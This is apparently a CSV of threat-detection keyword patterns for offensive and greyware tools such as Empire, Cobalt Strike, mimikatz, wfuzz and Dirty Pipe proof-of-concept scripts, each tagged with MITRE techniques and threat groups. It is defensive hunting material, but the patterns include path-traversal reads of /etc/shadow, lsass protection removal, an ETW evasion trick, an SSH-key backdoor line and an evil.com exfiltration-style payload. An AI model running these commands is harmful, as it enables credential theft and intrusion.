- T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/boku7/xPipe,1,0,N/A,10,10,73,21,2023-03-08T15:51:47Z,2021-12-07T22:56:30Z -* Your payload has been delivered*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,0,Exploit-JBoss.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z -* -z burplog*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -z file*wordlist/*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -z list*nonvalid-httpwatch --basic*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -z range --zD 0-1 -u http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -* -z range*0-10 --hl 97 http*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,0,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*!autoruns *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!files upload *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!handlers load *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!implants *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!interactive *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!modules load *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!processprotect *lsass.exe*,offensive_tool_keyword,mimikatz,removing process protection for the lsass.exe process can potentially enable adversaries to inject malicious code or manipulate the process to escalate privileges or gather sensitive information such as credentials. command: !processprotect /process:lsass.exe /remove,T1003 - T1021.001 - T1053 - T1055 - T1057 - T1059.003 - T1070 - T1071 - T1078.002 - T1078.003 - T1078.005 - T1106 - T1136 - T1204 - T1218 - T1547 - T1555.003 - T1555.004 - T1573 - T1574 - T1596 - T1543,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0010 - TA0040,N/A,N/A,Exploitation tools,https://github.com/gentilkiwi/mimikatz,1,0,N/A,10,10,17798,3445,2023-08-03T09:01:21Z,2014-04-06T18:30:02Z -*!put */tmp*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!shell *,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!tunnels --tcp*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!use *aes256_py*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!use *reflected_assembly*,offensive_tool_keyword,Nuages,A modular C2 framework,T1027 - T1055 - T1071 - T1105 - T1566 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/p3nt4/Nuages,1,0,N/A,10,10,373,80,2023-10-02T23:24:19Z,2019-05-12T11:00:35Z -*!wPkgPath!*!ak!*,offensive_tool_keyword,C2 related tools,PowerShell rebuilt in C# for Red Teaming purposes,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik Spider,C2,https://github.com/bitsadmin/nopowershell,1,0,N/A,10,10,761,126,2021-06-17T12:36:05Z,2018-11-28T21:07:51Z -*$attacker_IPlist*,offensive_tool_keyword,linWinPwn,linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks,T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016,TA0007 - TA0009 - TA0003 - TA0002 - TA0005,N/A,N/A,Network Exploitation Tools,https://github.com/lefayjey/linWinPwn,1,0,N/A,N/A,10,1384,210,2023-10-03T13:10:13Z,2021-12-16T22:13:10Z -*$C2_SERVER*,offensive_tool_keyword,cobaltstrike,Convert Cobalt Strike profiles to modrewrite scripts,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/threatexpress/cs2modrewrite,1,1,N/A,10,10,553,114,2023-01-30T17:47:51Z,2017-06-06T14:53:57Z -*$DummyServiceName*,offensive_tool_keyword,crackmapexec,Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*$env:COMPlus_ETWEnabled=0*,offensive_tool_keyword,ETW,stop ETW from giving up your loaded .NET assemblies to that pesky EDR but can't be bothered patching memory? Just pass COMPlus_ETWEnabled=0 as an environment variable during your CreateProcess call,T1055.001 - T1059.001 - T1562.001,TA0005 - TA0040,N/A,N/A,Defense Evasion,https://gist.github.com/xpn/64e5b6f7ad370c343e3ab7e9f9e22503,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*$FilterArgs = @{ name='Notion'*EventNameSpace='root\\CimV2'*QueryLanguage=*WQL* Query=*SELECT * FROM __InstanceModificationE*,offensive_tool_keyword,OffensiveNotion,Notion (yes the notetaking app) as a C2.,T1090 - T1090.002 - T1071 - T1071.001,TA0011 - TA0042,N/A,N/A,C2,https://github.com/mttaggart/OffensiveNotion,1,0,N/A,10,10,1002,111,2023-05-21T13:24:01Z,2022-01-18T16:39:54Z -*$KeePassBinaryPath*,offensive_tool_keyword,crackmapexec,Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*$KeePassUser*,offensive_tool_keyword,crackmapexec,Variable name from script RestartKeePass.ps1 from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct lateral movement through targeted networks ,T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002,TA0002 - TA0006 - TA0007,N/A,APT39 - Dragonfly - FIN7 - MuddyWater,POST Exploitation tools,https://github.com/Porchetta-Industries/CrackMapExec,1,0,N/A,N/A,10,7678,1595,2023-09-09T14:19:36Z,2015-08-14T14:11:55Z -*%APPDATA%/Indexing.*,offensive_tool_keyword,JunctionFolder,Creates a junction folder in the Windows Accessories Start Up folder as described in the Vault 7 leaks. On start or when a user browses the directory - the referenced DLL will be executed by verclsid.exe in medium integrity.,T1547.001 - T1574.001 - T1204.002,TA0005 - TA0004,N/A,N/A,Persistence - Defense Evasion,https://github.com/matterpreter/OffensiveCSharp/tree/master/JunctionFolder,1,0,N/A,10,10,1214,251,2023-02-06T14:56:26Z,2019-02-06T00:32:29Z -*%comspec% /k *.bat*,offensive_tool_keyword,cobaltstrike,C# .Net 5.0 project to build BOF (Beacon Object Files) in mass,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/ceramicskate0/BOF-Builder,1,0,N/A,10,10,23,3,2023-07-25T22:19:27Z,2021-09-07T01:28:11Z -*%COMSPEC%*echo*\pipe\*,greyware_tool_keyword,echo,Detects the use of getsystem Meterpreter/Cobalt Strike command. Getsystem is used to elevate privilege to SYSTEM account.,T1068.003 - T1078.002,TA0004 - TA0008,N/A,N/A,Exploitation Tools,https://github.com/SigmaHQ/sigma/blob/master/rules/windows/process_creation/win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,1,0,greyware tool - risks of False positive !,N/A,10,6749,1943,2023-10-03T04:55:17Z,2016-12-24T09:48:49Z -*%SystemRoot%\\MEMORY.DMP*,greyware_tool_keyword,CIMplant,C# port of WMImplant which uses either CIM or WMI to query remote systems,T1047 - T1059.001 - T1021.006,TA0002 - TA0007 - TA0008,N/A,N/A,Lateral Movement - Sniffing & Spoofing,https://github.com/RedSiege/CIMplant,1,0,N/A,10,2,189,30,2021-07-14T18:18:42Z,2021-01-29T21:41:58Z -*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*,offensive_tool_keyword,Openssh,Infecting SSH Public Keys with backdoors,T1098.003 - T1562.004 - T1021.004,TA0006 - TA0002 - TA0011,N/A,N/A,C2,https://blog.thc.org/infecting-ssh-public-keys-with-backdoors,1,0,N/A,10,9,N/A,N/A,N/A,N/A -*&& telnet * 2>&1 &Email=autodiscover/autodiscover.json%3f@evil.com,T1190 - T1140 - T1564 - T1204 - T1505,TA0001 - TA0005,N/A,N/A,Exploitation tools,https://gteltsc.vn/blog/warning-new-attack-campaign-utilized-a-new-0day-rce-vulnerability-on-microsoft-exchange-server-12715.html,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*...::$index_allocation*,greyware_tool_keyword,$index_allocation,creation of hidden folders (and file) via ...$.......::$index_allocation,T1027.001 - T1564.001,TA0005 ,N/A,N/A,Defense Evasion,https://soroush.me/blog/2010/12/a-dotty-salty-directory-a-secret-place-in-ntfs-for-secret-files/,1,0,N/A,8,10,N/A,N/A,N/A,N/A -*../../../../../../etc/passwd*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*../../../../../../etc/shadow*,offensive_tool_keyword,wfuzz,Web application fuzzer.,T1210.001 - T1190 - T1595,TA0007 - TA0002 - TA0010,N/A,N/A,Information Gathering,https://github.com/xmendez/wfuzz,1,1,N/A,9,10,5262,1327,2023-04-29T01:41:47Z,2014-10-22T21:23:49Z -*./*octopus.py*,offensive_tool_keyword,octopus,Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.,T1071 T1090 T1102,N/A,N/A,N/A,C2,https://github.com/mhaskar/Octopus,1,1,N/A,10,10,702,158,2021-07-06T23:52:37Z,2019-08-30T21:09:07Z -*./agscript *,offensive_tool_keyword,Earth Lusca Operations Tools,Earth Lusca Operations Tools and commands,T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005,TA0001 - TA0002 - TA0003,cobaltstrike - mimikatz - powersploit - shadowpad - winnti,Earth Lusca,Exploitation tools,https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*./awsloot *,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,0,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*./awsloot.py*,offensive_tool_keyword,AWS-Loot,Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.,T1552,TA0002,N/A,N/A,Exploitation tools,https://github.com/sebastian-mora/AWS-Loot,1,1,N/A,N/A,1,64,14,2020-02-02T00:51:56Z,2020-02-02T00:25:46Z -*./Brutesploit*,offensive_tool_keyword,BruteSploit,BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text,T1110,N/A,N/A,N/A,Exploitation tools,https://github.com/screetsec/BruteSploit,1,1,N/A,N/A,7,665,261,2020-04-05T00:29:26Z,2017-05-31T17:00:51Z -*./c2lint *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A -*./chisel *,offensive_tool_keyword,AD exploitation cheat sheet,Chisel proxying - On our attacking machine (Linux in this case) we start a Chisel server on port 80 in reverse SOCKS5 mode.,T1071 - T1090 - T1102,N/A,N/A,N/A,POST Exploitation tools,https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference,1,0,N/A,N/A,N/A,N/A,N/A,N/A,N/A -*./cowpy.sh *,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/nowsecure/dirtycow,1,0,N/A,N/A,1,93,30,2019-05-13T13:17:31Z,2016-10-22T14:00:37Z -*./cowroot*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/exrienz/DirtyCow,1,0,N/A,N/A,1,27,27,2018-07-23T02:07:24Z,2017-05-12T10:38:20Z -*./dcow -s*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/gbonacini/CVE-2016-5195,1,0,N/A,N/A,3,289,122,2017-03-21T16:46:38Z,2016-10-23T00:16:33Z -*./Dent -*,offensive_tool_keyword,cobaltstrike,A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/optiv/Dent,1,0,N/A,10,10,296,51,2023-08-18T17:28:54Z,2021-05-03T14:00:29Z -*./dirty*,offensive_tool_keyword,POC,POC exploitation for dirtycow vulnerability,T1533,TA0003,N/A,N/A,Exploitation tools,https://github.com/FireFart/dirtycow,1,0,N/A,N/A,8,767,437,2021-04-08T11:35:12Z,2016-11-25T21:08:01Z -*./Dirty-Pipe*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,t1543,TA0003,N/A,N/A,Exploitation tools,https://github.com/bbaranoff/CVE-2022-0847,1,1,N/A,N/A,1,49,25,2022-03-07T15:52:23Z,2022-03-07T15:50:18Z -*./Dirty-Pipe*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1543,TA0003 - TA0004,N/A,N/A,Exploitation tools,https://github.com/puckiestyle/CVE-2022-0847,1,1,N/A,N/A,1,1,1,2022-03-10T08:10:40Z,2022-03-08T14:46:21Z -*./dnscat*,offensive_tool_keyword,dnscat2,This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol,T1071.004 - T1102 - T1071.001,TA0002 - TA0003 - TA0008,N/A,N/A,C2,https://github.com/iagox86/dnscat2,1,0,N/A,10,10,3077,596,2023-04-26T17:40:22Z,2013-01-04T23:15:55Z -*./dome.py*,offensive_tool_keyword,DOME,DOME - A subdomain enumeration tool,T1583 - T1595 - T1190,TA0011 - TA0009,N/A,N/A,Network Exploitation tools,https://github.com/v4d1/Dome,1,1,N/A,N/A,4,375,50,2022-03-10T12:08:17Z,2022-02-20T15:09:40Z -*./donut *.exe*,offensive_tool_keyword,havoc,Havoc is a modern and malleable post-exploitation command and control framework,T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001,TA0002 - TA0003,N/A,N/A,C2,https://github.com/HavocFramework/Havoc,1,0,N/A,10,10,4893,746,2023-10-03T23:32:31Z,2022-09-11T13:21:16Z -*./encryptor -f *.exe -o *.enc*,offensive_tool_keyword,mortar,red teaming evasion technique to defeat and divert detection and prevention of security products.Mortar Loader performs encryption and decryption of selected binary inside the memory streams and execute it directly with out writing any malicious indicator into the hard-drive. Mortar is able to bypass modern anti-virus products and advanced XDR solutions,T1055 - T1027 - T1036 - T1112 - T1037 - T1105 - T1059 - T1562,TA0002 - TA0003 - TA0006 - TA0008,N/A,N/A,Defense Evasion,https://github.com/0xsp-SRD/mortar,1,0,N/A,N/A,10,1181,193,2022-08-03T03:38:57Z,2021-11-25T16:49:47Z -*./Exfil.sh*,offensive_tool_keyword,AutoC2,AutoC2 is a bash script written to install all of the red team tools that you know and love,T1059.004 - T1129 - T1486,TA0005 - TA0002 - TA0040,N/A,N/A,Exploitation Tools,https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2,1,0,N/A,10,4,348,73,2023-09-30T13:40:08Z,2022-03-23T15:52:41Z -*./exploit /etc/passwd 1 *cat /etc/passwd*,offensive_tool_keyword,dirty-pipe,POC exploitation for dirty pipe vulnerability,T1068 - T1055 - T1003 - T1015,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/0xIronGoat/dirty-pipe,1,0,N/A,N/A,1,9,9,2022-03-08T15:47:53Z,2022-03-08T15:30:45Z -*./exploit /etc/passwd 1 ootz:*,offensive_tool_keyword,POC,POC exploitation for dirty pipe vulnerability,T1204 - T1055 - T1003 - T1015 - T1068 - T1059 - T1047,TA0001 - TA0002 - TA0003 - TA0008,N/A,N/A,Exploitation tools,https://github.com/ahrixia/CVE_2022_0847,1,0,N/A,N/A,1,21,15,2022-03-08T13:15:35Z,2022-03-08T12:43:43Z -*./fake-sms*,offensive_tool_keyword,fake-sms,A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.,T1598.003 - T1514,TA0003 - TA0009,N/A,N/A,Defense 